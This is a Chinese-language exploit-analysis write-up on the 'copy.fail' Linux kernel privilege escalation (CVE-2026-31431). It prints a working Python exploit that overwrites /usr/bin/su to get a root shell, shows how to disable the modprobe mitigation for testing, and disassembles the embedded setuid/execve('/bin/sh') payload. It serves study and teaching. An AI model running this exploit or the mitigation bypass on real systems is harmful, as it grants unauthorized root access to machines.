CVE-2026-31431 (复制失败) — x86-64 汇编语言的分析与开发
以 Theori 发布的源代码为基础,我们将进行多项练习,直至将其完全转换为纯汇编语言(无外部库)。```python #!/usr/bin/env python3
import os as g,zlib,socket as s def d(x):return bytes.fromhex(x) def c(f,t,c): a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"4+c],[(h,3,i4),(h,2,b'\x10'+i19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o) try:u.recv(8+t) except:0 f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3")) while i<len(e):c(f,i,e[i:i+4]);i+=4 g.system("su")
## 测试环境
我们将使用以下机器进行练习。```bash
> $ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 24.04.4 LTS
Release: 24.04
Codename: noble
> $ uname -rm
6.19.4-061904-generic x86_64
我们运行Python程序来验证系统是否存在漏洞。如果报错,则不存在漏洞;如果打开sh shell,则存在漏洞。```bash
$ python3 copyfail.py Traceback (most recent call last): File "/home/gmg/copy.fail/copyfail.py", line 11, in while i<len(e):c(f,i,e[i:i+4]);i+=4 ^^^^^^^^^^^^^^^ File "/home/gmg/copy.fail/copyfail.py", line 7, in c a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"4+c],[(h,3,i4),(h,2,b'\x10'+i19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ FileNotFoundError: [Errno 2] No such file or directory
### 禁用缓解措施
在这台机器上,缓解措施是通过自动安全更新下载的,因此失败了。为了测试,我们通过重命名缓解措施所在的文件来降低防御。```bash
# Buscar si existe un modprobe explícito
> $ grep -r "algif" /etc/modprobe.d/
/etc/modprobe.d/disable-algif_aead.conf:# Disable algif_aead module due to CVE-2026-31431 (AKA copy.fail)
/etc/modprobe.d/disable-algif_aead.conf:install algif_aead /bin/false
# Renombrar el archivo donde se encuentra la mitigación
> $ sudo mv /etc/modprobe.d/disable-algif_aead.conf /etc/modprobe.d/disable-algif_aead.conf.bak
我们再次测试这个程序,这次它返回了shell,我们确认自己是root。```bash
$ python3 copyfail.py
uid=0(root) gid=1000(gmg) groups=1000(gmg),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),101(lxd)
### 重新激活保护
练习结束后,我们执行以下操作来重新激活保护:```bash
> $ sudo mv /etc/modprobe.d/disable-algif_aead.conf.bak /etc/modprobe.d/disable-algif_aead.conf
> $ sudo modprobe -r algif_aead
> $ sudo sync && echo 3 | sudo tee /proc/sys/vm/drop_caches
我们首先要分析的是使用zlib压缩的字符串是什么。为此,我们创建了一个Python程序decompress.py,用于解压缩并生成一个文件:output.bin。```python
import zlib
hex_data = "78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"
data = zlib.decompress(bytes.fromhex(hex_data))
with open("output.bin", "wb") as f: f.write(data)
print(f"Archivo generado: output.bin ({len(data)} bytes)")
我们执行并分析文件类型。```bash
> $ python3 decompress.py
Archivo generado: output.bin (160 bytes)
> $ file output.bin
output.bin: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, no section header
现在我们知道它是一个 ELF 64-bit LSB executable 文件,让我们来调查它。```bash
$ readelf -a output.bin ELF Header: Magic: 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 Class: ELF64 Data: 2's complement, little endian Version: 1 (current) OS/ABI: UNIX - System V ABI Version: 0 Type: EXEC (Executable file) Machine: Advanced Micro Devices X86-64 Version: 0x1 Entry point address: 0x400078 Start of program headers: 64 (bytes into file) Start of section headers: 0 (bytes into file) Flags: 0x0 Size of this header: 64 (bytes) Size of program headers: 56 (bytes) Number of program headers: 1 Size of section headers: 0 (bytes) Number of section headers: 0 Section header string table index: 0
There are no sections in this file.
There are no section groups in this file.
Program Headers: Type Offset VirtAddr PhysAddr FileSiz MemSiz Flags Align LOAD 0x0000000000000000 0x0000000000400000 0x0000000000400000 0x000000000000009e 0x000000000000009e R E 0x1000
There is no dynamic section in this file.
There are no relocations in this file. No processor specific unwind information to decode
Dynamic symbol information is not available for displaying symbols.
No version information found in this file.
ELF结构占用 **120 字节**:**ELF 头部**(64 字节)+ **程序头部**(56 字节)。机器码从第 120 字节(0x78)开始,这与 **入口点地址:0x400078** 一致。
### 反汇编代码
有了 **入口点地址:0x400078**,我们就可以开始反汇编代码了。```bash
> $ objdump -D -b binary -m i386:x86-64 -M intel -z --start-address=0x78 output.bin
output.bin: file format binary
Disassembly of section .data:
0000000000000078 <.data+0x78>:
78: 31 c0 xor eax,eax
7a: 31 ff xor edi,edi
7c: b0 69 mov al,0x69
7e: 0f 05 syscall
80: 48 8d 3d 0f 00 00 00 lea rdi,[rip+0xf] # 0x96
87: 31 f6 xor esi,esi
89: 6a 3b push 0x3b
8b: 58 pop rax
8c: 99 cdq
8d: 0f 05 syscall
8f: 31 ff xor edi,edi
91: 6a 3c push 0x3c
93: 58 pop rax
94: 0f 05 syscall
96: 2f (bad)
97: 62 69 6e 2f 73 (bad)
9c: 68 .byte 0x68
9d: 00 00 add BYTE PTR [rax],al
9f: 00 .byte 0
每个参数的解释:
-D — Disassemble All。反汇编文件的所有内容,而不仅仅是标记为代码的节。如果没有此参数,-d 只会反汇编 .text 节,而由于该文件没有 ELF 节(它是纯二进制),它将不会显示任何内容。-b binary — Binary format。告诉 objdump 将文件视为原始数据,不尝试解析 ELF 头部。如果没有此参数,objdump 会尝试读取文件的 ELF 头部,导致失败或错误的反汇编。-m i386:x86-64 — Machine architecture。指定用于反汇编的指令集。i386 是基础系列,:x86-64 指定 64 位模式。当使用 -b binary 时必须指定,因为缺少 ELF 头部时,objdump 无法获知架构。如果没有 -m,会默认 i386(32 位),导致反汇编错误——像 lea rdi, [rip+0xf] 这样的 64 位指令会被解码为垃圾代码。-M intel — Syntax mode。使用 Intel 语法(mov al, 0x69)而非 AT&T 语法(mov $0x69, %al)。-z — 禁用对零序列的省略。这样会显示所有内容,不会省略零。--start-address=0x78 — 从偏移量 0x78(120 字节)开始。跳过负载的 ELF 头部和程序头部,只反汇编机器代码。如果没有此参数,会将头部反汇编为指令。总结:使用 -b binary 时,-m 是必需的,因为 objdump 无法在没有 ELF 头部的情况下推断架构。对于正常的 ELF 文件(不使用 -b binary),不需要 -m,因为架构信息保存在头部的 e_machine 字段中。
参数 -z 在此场景下至关重要,因为稍后我们会看到,有些零被用作填充,如果没有此参数,它将显示后续内容,而无法得到精确的反汇编结果。```bash
9d: 00 00 add BYTE PTR [rax],al
...
### 识别字符串 "/bin/sh"